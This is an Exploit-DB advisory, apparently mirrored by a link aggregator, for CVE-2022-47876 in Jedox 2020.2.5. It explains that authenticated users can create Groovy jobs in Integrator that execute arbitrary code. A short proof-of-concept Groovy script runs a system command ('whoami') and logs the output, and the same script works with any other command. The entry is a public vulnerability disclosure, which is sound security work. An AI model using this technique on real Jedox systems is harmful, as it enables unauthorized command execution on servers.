3

[webapps] Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts

 1 year ago
source link: https://www.exploit-db.com/exploits/51427
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
neoserver,ios ssh client

Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts

EDB-ID:

51427

EDB Verified:

Platform:

PHP

Date:

2023-05-05

Vulnerable App:

# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
# Date: 28/04/2023
# Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47876


Introduction
=================
Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.


Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.


Proof of Concept
=================
1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:

	def sout = new StringBuilder(), serr = new StringBuilder()
	def proc = 'whoami'.execute()
	proc.consumeProcessOutput(sout, serr)
	proc.waitForOrKill(10000)
	LOG.error(sout.toString());
	LOG.error(serr.toString());

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK